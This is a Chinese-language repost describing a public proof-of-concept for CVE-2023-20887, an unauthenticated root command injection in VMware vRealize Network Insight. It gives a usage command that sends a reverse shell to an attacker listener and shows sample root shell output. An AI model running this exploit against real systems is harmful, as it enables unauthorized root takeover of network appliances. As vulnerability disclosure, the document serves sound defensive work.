VMWare vRealize Network Insight 预认证远程代码执行漏洞(CVE-2023-20887)
作者:Sec-Labs | 发布时间:
项目地址
https://github.com/sinsinology/CVE-2023-20887
小编推荐
本项目是一个POC,用于利用CVE-2023-20887漏洞,使没有认证的远程攻击者能够在VMware Aria Operations for Networks(vRealize Network Insight)中执行任意命令,包括在操作系统下以root用户的身份执行命令。
相关技术点
- CVE-2023-20887漏洞:指VMware Aria Operations for Networks(vRealize Network Insight)在接受用户输入时,通过Apache Thrift RPC接口存在命令注入漏洞,远程未认证攻击者可以利用此漏洞在操作系统下执行任意命令,包括在操作系统下以root用户的身份执行命令。
- CVSSv3:计算漏洞严重性的开放标准。
- RPC接口:远程过程调用(RPC)是一种协议,用于在网络上从一个计算机程序向另一个计算机程序请求服务。RPC通常使用客户端/服务器模式。
- 反向代理:反向代理是一种服务器,它接受来自客户端的 Internet 流量,并将该流量转发到托管在其后面的服务器。
项目用途
该项目提供一个POC,用于利用CVE-2023-20887漏洞,使没有认证的远程攻击者能够在VMware Aria Operations for Networks(vRealize Network Insight)中执行任意命令,包括在操作系统下以root用户的身份执行命令。
Mitigations
更新到最新版本或按照进展公告中的说明进行缓解:
免责声明
此软件仅用于学术研究和开发有效的防御技术,不打算用于攻击系统,除非经过明确授权。项目维护人员对软件的误用不负责任。请负责任地使用。
CVE-2023-20887
VMware Aria Operations for Networks (vRealize Network Insight) 未经身份验证的远程命令执行漏洞(CVE-2023-20887)的 POC
技术分析
该漏洞的根本原因分析可在我的博客中找到: https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

概要
VMware Aria Operations for Networks (vRealize Network Insight) 在通过 Apache Thrift RPC 接口接受用户输入时存在命令注入漏洞。此漏洞允许远程未经身份验证的攻击者以 root 用户身份在底层操作系统上执行任意命令。RPC 接口受反向代理保护,但可以绕过。VMware 已将此问题的严重性评估为严重级别,其最大 CVSSv3 基础分数为 9.8。 恶意行为者可以在设备上获取 root 上下文中的远程代码执行。 VMware 6.x 版本存在漏洞。
使用
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release
缓解措施
更新到最新版本或按照 Progress Advisory 中的说明进行缓解
关注我们的 Twitter 获取最新的安全研究成果:
免责声明
此软件仅用于学术研究目的和有效防御技术的开发,不打算用于攻击系统,除非得到明确授权。项目维护者不对软件的误用负责或承担责任。请负责任地使用。